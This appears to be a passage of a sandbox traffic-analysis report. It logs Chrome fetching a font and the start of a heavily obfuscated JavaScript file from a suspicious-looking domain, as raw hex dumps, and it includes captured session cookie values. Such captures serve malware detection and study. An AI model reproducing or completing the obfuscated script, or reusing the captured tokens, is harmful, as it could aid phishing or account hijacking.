                                                          2024-08-27 22:11:09 UTC1369INData Raw: 11 0d 58 a9 2e 71 1b 1f 61 c5 f5 94 ef d3 73 ea 88 7e fb b9 e6 e1 b6 70 c5 34 0a fa 3b 86 fc cc ba 3c 05 7c 34 ea 88 f5 a3 a2 c0 20 35 13 6c 15 e6 41 b8 3e b6 11 22 ac 69 58 6e 3e 6f 9f 28 7b a8 5f 8d bd 76 d8 eb 29 93 79 48 c9 a3 99 6f 6d 06 7f 5d 9e f1 6c 7c 55 3b 55 c9 af 3f cf 18 45 2c 1f 72 44 e3 8e 81 85 63 86 d5 6b ad b7 62 ee 7b 30 a5 df b6 73 24 1a c7 c1 b3 0d fe d9 73 ef 8f c3 b0 9d 51 f5 d7 70 ba 54 f4 24 dd 1a 73 5e 9d 9c 39 5d 1e 8c 82 fe 2c 1f ac a6 0c ba fc c5 27 14 94 19 0f 5f 43 a0 42 02 67 1f be 85 af e9 f8 fc a5 c4 0d b4 f6 ff a2 a2 95 1c ec dd 96 1c e3 1d 16 52 27 61 e2 78 29 ad 1d 7e c2 7e d3 02 91 a1 b6 1e d4 a0 32 62 5d 05 eb 60 2f a3 ce 28 2a e3 76 d1 e6 94 8a 9e 84 ca d4 81 95 59 f2 d3 14 a9 29 ba 67 d3 7a 42 a4 6b 91 4a 3a b2 89
                                                          Data Ascii: X.qas~p4;<|4 5lA>"iXn>o({_v)yHom]l|U;U?E,rDckb{0s$sQpT$s^9],'_CBgR'ax)~~2b]`/(*vY)gzBkJ:
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 66 46 b8 5f 12 ff ff f1 87 04 f0 10 a2 2a 99 3a 19 38 85 1e 76 b6 ca 97 a4 50 a1 74 c5 4a 64 28 d7 28 4b 8b 76 a5 ba f4 a8 34 64 58 ad 57 5e a9 37 61 5a 83 05 0b b0 56 ec 6a b1 ef 8d 6e 47 be ea 77 69 c1 73 7e 5b 36 e1 26 c8 81 08 6c e7 58 14 76 72 2e 2a 52 87 d1 0a 77 14 a7 68 9f bb 2f d5 97 1e 6b e9 a2 36 6d fd ae 5d 6f 7f 1a b0 82 9f bb 29 b7 d4 fd 91 ac f6 10 55 d6 d9 81 2f c0 08 b1 30 af 61 14 e9 1d cc 52 bc 9b 4d aa f7 6a 94 66 cc 30 31 cf 58 e7 eb 7d 07 9e e7 07 f4 ff dd 72 11 79 f7 17 5f 34 4c 30 6f 52 00 13 2c 5d 6a a1 96 01 ec 65 65 8c c9 a0 60 fb 80 e3 33 a2 57 29 00 94 cf 1c 2c af 0c ea d6 9e 38 04 86 2f cf 6a 38 67 ad fd e2 eb f5 49 f1 24 1f c0 fb 3c e2 91 ad 41 0a dd d8 dc da de ed 78 67 77 6f ff 60 6d 3b 3c b2 37 0b d6 4e c2 93 8f 27 d8 63
                                                          Data Ascii: fF_*:8vPtJd((Kv4dXW^7aZVjnGwis~[6&lXvr.*Rwh/k6m]o)U/0aRMjf01X}ry_4L0oR,]jee`3W),8/j8gI$<Axgwo`m;<7N'c
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 85 cd e8 3b 74 ea d2 ad 47 af 01 83 2a 50 d0 30 b0 86 e7 e1 2b 22 33 b7 92 8a 9a 86 56 b1 9b 6b ab d7 c0 f1 42 d4 c9 4c 7c 57 eb 35 6a d6 a2 4d 87 17 ba 74 eb d5 6f f0 25 a9 7f fd e7 cc 5b b0 68 c9 b2 15 ab d6 ac db b4 65 db 8e 5d 7b f6 1f 5c 46 ee 05 c1 f8 3a a8 e2 f4 ae 1d 96 85 be 31 95 e5 ba 29 b3 5a 43 66 ac 5d ff 03 0f b1 75 01 fc b2 4f 81 3a f6 64 4f 47 bb 09 e2 3c 29 42 ad e2 3e 22 4d c4 96 88 6b 74 7e fd 64 e0 75 81 12 2b 3a af dd 10 60 9b 79 6f a0 89 16 44 eb 3a 5f 22 ef c0 43 4c be cd 4a 39 0e c7 e5 59 da 0b 4e c2 cb e5 0c c1 50 23 94 b7 f3 4e de 25 4a c6 14 ad b2 60 08 6e 56 39 dc aa d3 6a 2d 0f 41 b9 5a df dc ee da de da be da fe 15 9d 13 bc 46 63 60 98 0d 8b 15 9c 87 cd 92 34 67 eb 36 27 78 65 b2 4c 56 6b 35 cf d3 9b ce db eb 34 8f e2 f8 0d
                                                          Data Ascii: ;tG*P0+"3VkBL|W5jMto%[he]{\F:1)ZCf]uO:dOG<)B>"Mkt~du+:`yoD:_"CLJ9YNP#N%J`nV9j-AZFc`4g6'xeLVk54
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 63 a4 7d 4c 7f a8 5d 3c fc e6 0b 52 65 a8 96 ad 58 0e 9c 5d eb b6 6c 47 61 61 c3 76 2e 25 66 40 87 ee 2b 77 72 0b b9 36 71 8f ab 5f 1d 5b f5 cc bb 91 f0 45 30 3e 81 94 2f a3 d2 8e 56 37 3a 3d a8 75 61 30 8d d1 0c 4e 07 58 6c 60 b7 83 db 11 56 9b 78 3d f6 4d 93 ef f2 ae 35 07 29 06 c0 76 69 21 92 12 8b a1 27 35 49 2b 44 12 93 cf 48 71 b0 40 ca 43 53 1d 9e ca b0 90 23 52 1b 9b e6 94 b4 a7 a7 35 4d 21 2e 87 4c c3 aa 9a 97 c9 d2 f4 17 66 95 1f bf 28 5e 61 c2 ca 24 35 89 ab 13 55 a5 5c 9f 62 5d f2 f6 6c 6f 17 b8 23 ef de 82 df 2a 60 7b 41 6f 16 f1 7e 31 ad 15 2b a1 9d 92 db 2f b1 dd 08 f8 24 f1 58 b6 cd cf a7 2f 72 be 06 8f cf 43 45 27 ad 4d b5 a1 b3 3a 34 5b ca 51 91 0f 59 c2 86 19 45 7e 58 f8 7b 3d fb a0 a4 f6 ba ef b4 4e 2f bc d4 55 5c 9b c5 b7 d5 1b ff 37
                                                          Data Ascii: c}L]<ReX]lGaav.%f@+wr6q_[E0>/V7:=ua0NXl`Vx=M5)vi!'5I+DHq@CS#R5M!.Lf(^a$5U\b]lo#*`{Ao~1+/$X/rCE'M:4[QYE~X{=N/U\7


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          49192.168.2.449823188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:09 UTC1450OUTGET /eflbaMIh8KvYQ56Fw0I2qKmn100 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Origin: https://kpl2.r04ar2.com
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: font
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:09 UTC630INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:09 GMT
                                                          Content-Type: font/woff2
                                                          Content-Length: 93276
                                                          Connection: close
                                                          Content-Disposition: inline; filename="eflbaMIh8KvYQ56Fw0I2qKmn100"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bmlf%2FAOF39P%2Bcerce19dhxwOW61rrcfVe6BFnk9qUmORLCh%2F4J2hrhwhUcoVHAGAtaXuGDconNJP16JXl4%2FFtHXXa184uy%2Fq8I0GXdpGyeWxhDDD5dLnC7m%2FPo8tQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f654e6bf85e80-EWR
                                                          2024-08-27 22:11:09 UTC739INData Raw: 77 4f 46 32 00 01 00 00 00 01 6c 5c 00 14 00 00 00 04 b2 20 00 01 6b e0 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a a4 76 1b 83 bb 26 1c 93 24 3f 48 56 41 52 a0 6a 3f 4d 56 41 52 81 46 06 60 3f 53 54 41 54 81 36 27 38 00 91 18 2f 81 48 11 08 0a 81 f8 0c 81 d3 78 0b 89 1a 00 30 8b e7 3a 01 36 02 24 03 92 30 04 20 05 97 7a 07 a2 17 5b 12 9a 94 07 25 22 db df 13 ba a5 ab c1 a5 a2 a8 fe 21 df bb 49 da 54 19 b0 7f a9 77 90 21 63 9b 48 1d ce cd 74 1d 5d 6b a5 08 9e a7 0f c8 36 9d f1 82 43 79 c3 a8 7f 55 6c b7 72 65 ff ff ff ff ff ff 9b 92 49 8c e9 25 e8 25 f9 7f 00 15 44 45 b1 a0 ba ce 76 d3 69 ae 51 46 38 dc dd 84 83 d2 69 48 19 21 72 0a ca e2 f4 da d1 50 34 5a 5b b9 db ae 1d f6 5a 73 10 9e 89 b6 6f 06 0e 72 ef e2 38 62 1c 4f e8
                                                          Data Ascii: wOF2l\ kv&$?HVARj?MVARF`?STAT6'8/Hx0:6$0 z[%"!ITw!cHt]k6CyUlreI%%DEviQF8iH!rP4Z[Zsor8bO
                                                          2024-08-27 22:11:09 UTC1369INData Raw: f1 f9 f3 34 67 bd 3f f3 47 f2 33 13 26 d3 99 30 4c 26 e9 24 85 40 52 36 bb a5 e2 88 55 8c 15 6f 9d dd 3a ed 9a 53 a7 3d 0a d4 1c b3 db 62 55 0b a1 75 ca 5d 7a ac 57 38 5b 55 18 7c 37 fb 27 fe 25 e6 f2 75 2e 9c 88 31 31 8e 19 67 3c c6 ba 5e c7 a0 eb fa 4a c9 da 50 42 1b 4a 48 42 02 11 f0 6b fa b3 0f 0e 89 0a 91 8a 5d c4 80 28 24 a5 0d 44 ae 16 ab 53 22 75 be b7 ce 37 e2 fc ab 39 9f 38 15 a3 ee d4 9c 1a 55 a3 e6 37 13 d4 a6 ed 52 24 04 df 78 a9 f9 ac 67 d0 58 9b 7a 56 81 2c a8 24 a5 19 ab 89 79 c6 3a 8e 8d 8a 88 86 51 24 4f 4d c7 b1 f6 b7 9f 71 cc e7 20 a3 88 08 28 df 96 4f e5 14 c4 00 22 12 64 3c 07 6c c8 ed 39 a9 fd 7c 5e 42 08 72 b6 35 8f d0 c3 f3 a7 fd cc b9 79 69 bb 44 99 0f b9 5f 84 16 09 3c 50 9b f9 6f 92 11 08 a9 28 52 65 ab 49 eb 90 c9 96 9a 40 45
                                                          Data Ascii: 4g?G3&0L&$@R6Uo:S=bUu]zW8[U|7'%u.11g<^JPBJHBk]($DS"u798U7R$xgXzV,$y:Q$OMq (O"d<l9|^Br5yiD_<Po(ReI@E
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 63 96 10 1c 40 42 44 dd f4 16 cf 30 00 2b fb 79 0b 30 ab c4 72 0d 2d 40 8d fe 19 13 b5 2f 74 e2 3e 24 50 23 ab dc 2a 66 4d 64 c4 fc ff 2f 53 ab 6d 24 50 26 09 49 5d 09 75 9d 3e c1 ea 31 1f d2 98 cf 56 cd 54 a8 74 6a 7f 21 1b e3 9c 0f 44 44 22 1d 29 45 26 48 55 24 92 52 07 92 54 55 20 21 75 7d 24 c8 3a 01 40 86 24 32 00 8a cd 24 e5 2d 59 9e 72 a6 cc 4b 24 d5 13 80 aa 7a 82 60 1b 94 34 ce 2d 67 b1 1c ca 96 d5 9c 33 32 e3 a4 1a e3 36 db 24 c7 b1 8d db a9 6a 45 cd 8a 9a 55 8a e3 a8 9a fd 86 aa 55 d5 ac d4 1a bf 33 7e d7 67 f8 e7 6d 4f ce f6 e5 66 e3 7f 46 56 c8 0a 61 36 e5 a3 4e 26 1e 46 a2 08 72 83 40 08 87 47 e1 7f 99 5a a6 68 7c 99 6e 6c d2 0f 2b 33 dc e8 4e 91 71 44 5d 90 6c 29 8d ba 7f af 41 f7 5b 43 0e ce 0d 46 16 90 e1 0e ce 11 23 c7 5d f9 38 5a 60 ce
                                                          Data Ascii: c@BD0+y0r-@/t>$P#*fMd/Sm$P&I]u>1VTtj!DD")E&HU$RTU !u}$:@$2$-YrK$z`4-g326$jEUU3~gmOfFVa6N&Fr@GZh|nl+3NqD]l)A[CF#]8Z`
                                                          2024-08-27 22:11:09 UTC1369INData Raw: b4 b6 e2 5b 28 0a 7e 3f b8 60 01 41 a5 a2 9d 5f aa aa 92 e7 97 9e 00 03 7a 83 f2 df f4 f1 96 7c fe b4 e4 ea d5 9a f9 6c b0 ba 4a 10 6f b7 59 2c ed 74 74 e4 f7 a7 d3 2b 96 40 40 51 66 f5 e7 a0 33 8f 73 f2 d6 c3 e5 9d c3 71 fc 46 72 66 3c 24 2e ce 60 06 3a c8 29 d6 a8 8f 62 ff a8 a5 b5 cd eb 44 76 4b 25 94 fc d0 62 76 e3 42 5d fd 97 64 4c 8b a5 52 6f f8 db 8f 00 94 fc c8 46 5c bd 1c c3 40 2b d1 7a 43 c4 ad 17 b2 b7 ee 9b 4d 09 0d f9 6d 07 99 10 1d 47 e6 96 3a 20 3d bc 3a 0d 3e bf 95 84 ea 25 93 ae 69 08 6c df 80 35 2a 08 70 c7 de 92 9c 79 e0 1a 17 e6 d0 2b 30 1e 2f 83 0e c7 e9 73 30 77 e7 e6 02 22 bb d8 06 99 5b ee 22 53 80 20 c8 6e 2c 06 05 26 12 28 14 52 ba 16 12 3d a2 47 3f 10 f5 06 a5 24 4d 82 75 e6 ad 90 27 62 69 e9 36 4c 84 88 93 25 f6 f6 23 80 28 d3
                                                          Data Ascii: [(~?`A_z|lJoY,tt+@@Qf3sqFrf<$.`:)bDvK%bvB]dLRoF\@+zCMmG: =:>%il5*py+0/s0w"["S n,&(R=G?$Mu'bi6L%#(
                                                          2024-08-27 22:11:09 UTC1369INData Raw: d6 9d 2d b4 a6 93 cf 99 1f a7 dd 6e 68 53 44 dd 65 65 89 d1 c0 a3 92 64 cc 31 18 63 26 13 31 4e cf 58 79 53 b2 2e db 9a 28 b6 9b 3c a6 00 5c 5e 11 8b 83 4b be 05 32 16 f2 27 f7 9c df b0 9c 1c 87 3a fa 62 03 4e 5f dc 30 32 d9 0e 2d 29 bb 39 86 5a ea 25 1c f9 80 80 d3 b0 59 47 03 e1 38 0e 99 e4 42 e4 67 ce e4 d4 da 88 c7 03 50 4c 29 22 8c 02 70 3a 8b 8a 3b 0f 04 48 26 b5 d1 e4 52 e7 01 3b 4a af d0 d3 a7 68 fe d1 72 c3 4a 60 ba 24 bf 8f 51 eb 11 25 b1 c6 4b 41 a6 d8 73 32 1b 16 4b c4 62 8e e3 36 ec 6e b3 cd 37 b4 0e 4b 95 68 ab 33 1a 0d ac 6a 2b cd a4 45 22 f2 62 82 62 42 1d c3 cc f9 59 5f 50 eb 07 b4 8a da 4d aa 17 47 d3 fa a5 80 8d 11 25 a5 a5 8e 5b 88 5c b9 82 21 5e 88 6c 18 63 03 d6 93 18 f3 cb 40 59 d9 d2 20 37 88 18 e8 62 0c ab b3 f8 99 33 4f d5 ea e1
                                                          Data Ascii: -nhSDeed1c&1NXyS.(<\^K2':bN_02-)9Z%YG8BgPL)"p:;H&R;JhrJ`$Q%KAs2Kb6n7Kh3j+E"bbBY_PMG%[\!^lc@Y 7b3O
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 2c b7 fc 55 50 9b 51 70 75 a8 cf 20 94 27 85 0a 16 c2 d5 50 55 97 db 1a cc e4 ea f8 bf 7f 82 9d cf b0 bf bf a8 d2 cf 05 72 5b e8 50 23 0f 23 4b 61 90 94 da f0 4d c9 51 9e 26 0a ec ec ab 69 b4 bd c3 2f 0a f0 74 03 f6 16 2e 59 39 12 0b bc 0c 0d 75 a9 8f 01 48 d7 04 85 96 d2 ab 02 9b de 6d db bd 90 bc 86 ef 83 5a 63 5b 32 e2 71 f8 6e c1 87 75 a9 ee 4c f7 99 27 02 3c 78 27 d8 98 de f7 56 7f 6e f1 fc aa 81 eb 24 c5 fb 60 e0 b0 f2 f0 af dd 25 60 5f 6c d7 6b c0 60 ea 09 fc a1 7e ef 21 d2 65 be 87 84 64 f1 c8 69 fa 9c 49 2f cf 79 79 88 42 e1 4d be 7d 02 60 bf 63 b8 ea ea 63 24 2b 5c 48 cf ca 79 d8 58 89 bd 6f 81 38 cf 87 07 47 13 25 b0 2d d0 2c 71 94 b6 07 95 04 aa e5 65 bc fd e1 eb 93 81 1b a5 d7 ee 19 35 2a 5a aa 17 d4 e1 0e 65 4b 21 2d a7 bf d7 25 e2 9e 22 d1
                                                          Data Ascii: ,UPQpu 'PUr[P##KaMQ&i/t.Y9uHmZc[2qnuL'<x'Vn$`%`_lk`~!ediI/yyBM}`cc$+\HyXo8G%-,qe5*ZeK!-%"
                                                          2024-08-27 22:11:09 UTC1369INData Raw: a7 8b 89 35 60 8b 3c b7 b7 76 cf d3 be da d0 82 50 1b dc 81 52 9f 2b 78 b5 85 1a db 2f 23 11 ee 7e 0f 9c d7 f5 b8 cb 06 d1 4f 79 55 8a 13 9b 6a a8 95 46 95 37 af 7b 7d 90 cb 24 1d 9e 26 31 5b 76 a7 8e 76 62 74 7b e0 dc a7 f1 6e 9f 45 d5 21 b2 23 85 2c cb e7 31 09 a3 7a 4c d0 45 20 b1 44 fe 05 66 c7 02 03 dc df d5 bb 25 f4 ec 02 f0 c1 23 0b fa 7f ae 9b 73 07 7b 16 f5 36 ec ec 00 db ec 7f d4 4b 78 3e 73 73 9f 0a ae ec e5 80 c4 cf 0a 3d 62 99 08 c1 b2 7d c7 70 b5 8c c7 69 52 40 79 3c 9f b9 99 d4 52 6e df 0a 35 b9 f0 ac 83 b5 6c 74 9e b8 70 fd 1d b6 ee 75 41 04 b5 ad 5c 10 e6 ad df 53 fe 59 1e 0a 54 02 09 f8 5e ab e5 8c c5 72 4c 47 c6 3b 62 55 95 51 f0 eb 4f 75 3e 57 a6 36 98 bc fe b1 bc ff 61 18 a2 79 e6 01 b9 02 66 9e 81 b8 b7 6b 51 78 30 95 72 f9 41 95 4f
                                                          Data Ascii: 5`<vPR+x/#~OyUjF7{}$&1[vvbt{nE!#,1zLE Df%#s{6Kx>ss=b}piR@y<Rn5ltpuA\SYT^rLG;bUQOu>W6ayfkQx0rAO
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 69 58 16 18 ff 45 1e a2 6d 55 84 60 bb 94 83 f1 a5 aa 10 eb 80 6a 04 ba dd 16 24 bb cb 76 94 bb db 0e 54 fa b4 dd 28 f7 19 9d a8 f4 59 7b 91 ec f3 f6 a1 d0 17 ec 47 b1 2f ea 42 a1 2f 39 80 62 df 74 12 bc df 77 06 bc 3f 73 01 b9 7e ee 71 e4 fb bb 2d ec ef 7f d2 19 f5 41 7b 18 ef 31 87 58 ef 21 27 d1 79 d4 69 74 9e 74 8d 23 23 9b 2c 50 b6 a6 80 27 3b 52 c2 93 d9 40 c0 e7 aa a0 90 01 f3 29 68 ec d8 71 e2 04 83 80 00 e3 c2 05 82 1b 37 71 1e 3c 50 15 2c 96 c1 03 90 05 75 49 6e 2d 19 e1 95 12 4e d0 eb 09 a1 25 6a 42 ad 00 59 26 63 cf 71 3e 9d 2c 30 95 67 c9 12 c6 10 a1 01 97 41 48 16 7e 72 c0 e5 e1 a3 00 5c 91 be b5 13 b4 60 8d 50 60 16 62 8c 23 2c 93 87 41 a6 b8 c0 32 1b d9 cc f1 84 5d ca eb c5 8d 70 d0 ac bc 4b 85 93 72 39 40 ae f8 bc 94 2b 97 55 20 79 76 b5
                                                          Data Ascii: iXEmU`j$vT(Y{G/B/9btw?s~q-A{1X!'yitt##,P';R@)hq7q<P,uIn-N%jBY&cq>,0gAH~r\`P`b#,A2]pKr9@+U yv
                                                          2024-08-27 22:11:09 UTC788INData Raw: a5 b8 da 6d 00 aa 75 3c 04 9b 2b 02 72 61 45 50 0c 27 48 8a 66 58 8e 17 c4 72 ff 0a aa a6 1b a6 65 03 00 88 b0 24 13 ca b8 50 54 ad 3e b1 db 03 04 84 eb 88 80 62 38 41 52 34 c3 72 bc 20 96 b6 51 46 51 6b 9b a9 63 98 56 a3 e2 13 15 c2 04 21 e9 30 60 05 83 86 c4 8f e9 a0 a9 ff f0 17 a0 b7 17 e7 07 65 da fd 98 7e d8 04 c0 0d b5 75 78 ca 39 2a af 15 ac 6d 98 37 9c 46 60 a4 51 46 1b 63 ac 64 29 52 a5 49 97 21 53 56 45 1d 2a 36 25 95 a2 4c b9 8a 2a 47 ac 4a 54 ab 51 5b dd e8 d5 a3 41 e3 73 28 bc 75 10 b4 db 41 a5 28 53 8e 1e d2 f3 3a cc bc 1d 7c fc 10 25 da bd f2 fc a6 e8 16 82 4b 39 b0 71 4d 28 28 c1 54 d4 34 0d d5 a6 e7 9b d7 02 78 db f5 6f 2c 5c 2e 36 76 cf fe a6 f4 a5 10 31 09 09 d0 9e 36 f0 1f 3e 12 3b 49 4b 4b 4b 4b 4b bf cf 6e e5 eb f8 ee 58 bb 05 4a 4b
                                                          Data Ascii: mu<+raEP'HfXre$PT>b8AR4r QFQkcV!0`e~ux9*m7F`QFcd)RI!SVE*6%L*GJTQ[As(uA(S:|%K9qM((T4xo,\.6v16>;IKKKKKnXJK
                                                          2024-08-27 22:11:09 UTC1369INData Raw: 30 59 6c 0e 97 07 85 41 50 ec 3f eb 55 92 90 4a a9 1e 39 b9 ec 76 d9 90 1d ed e6 9a 7a a6 cb 0b e6 fe 8d 79 f6 97 b7 b8 7e 8b cd 6d 37 f8 d0 a7 21 d2 48 8d b7 93 b8 a5 b7 0a cf 99 56 74 50 56 a9 ba 0b 6a a8 ad ea 36 e9 4e 2f 3b ff c3 13 40 b6 a3 83 05 3a 07 23 42 02 23 28 86 13 24 45 33 2c c7 0b a2 24 9f af 8e 70 f3 a7 99 8f 22 98 f7 02 af 2f 46 50 0c 27 48 01 45 33 2c 27 7c ce 90 84 47 cd 09 4f e1 95 a2 52 d7 14 6a d1 d5 63 b0 b3 77 e8 84 b3 4b 04 50 7d a2 c1 60 71 78 02 91 44 a6 50 69 f4 65 f0 36 9a e2 e6 be 20 06 29 8c b0 96 cd f3 38 70 97 27 88 f1 11 08 45 62 89 54 26 57 28 55 6a cd 6a 05 3a 1d 7a c3 e5 98 da df 33 99 2d d6 b6 b6 76 1c 4e d7 e7 f7 a6 b7 db 9e 6f 0e ae de 97 ad d1 81 af b9 39 78 24 00 e8 22 c7 ef 92 72 02 b9 ec 11 7c 29 89 de c4 85 7f
                                                          Data Ascii: 0YlAP?UJ9vzy~m7!HVtPVj6N/;@:#B#($E3,$p"/FP'HE3,'|GORjcwKP}`qxDPie6 )8p'EbT&W(Ujj:z3-vNo9x$"r|)


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          50192.168.2.449824188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:09 UTC1436OUTGET /34u2dqhNgiTTAmhQJRfAlijwjGO22rrieg8N89109 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:09 UTC649INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:09 GMT
                                                          Content-Type: application/javascript
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Disposition: inline; filename="34u2dqhNgiTTAmhQJRfAlijwjGO22rrieg8N89109"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8dQLh9xlWRnTqgg2q4L770uHzf51c55TzgF2ePjpnD0FXuvMq6eCWENQ9Da%2FjoFDSydmb2I9sAj4eG9tWIXdM1AXCYJ0470bJ9vBfpebcRj0HIWi4nrev6NX7IsiCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f654e6c06c328-EWR
                                                          2024-08-27 22:11:09 UTC720INData Raw: 32 37 35 65 0d 0a 63 6f 6e 73 74 20 5f 30 78 31 37 37 30 65 36 3d 5f 30 78 34 64 34 65 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 64 34 62 39 36 2c 5f 30 78 34 64 61 64 61 64 29 7b 63 6f 6e 73 74 20 5f 30 78 33 61 65 31 35 61 3d 5f 30 78 34 64 34 65 2c 5f 30 78 33 39 39 31 36 30 3d 5f 30 78 34 64 34 62 39 36 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 32 65 61 37 61 61 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 61 65 31 35 61 28 30 78 31 34 37 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 61 65 31 35 61 28 30 78 31 64 63 29 29 2f 30 78 32 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 61 65 31 35 61 28 30 78 31 32 61 29 29 2f 30 78 33 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 61 65 31 35 61 28 30 78
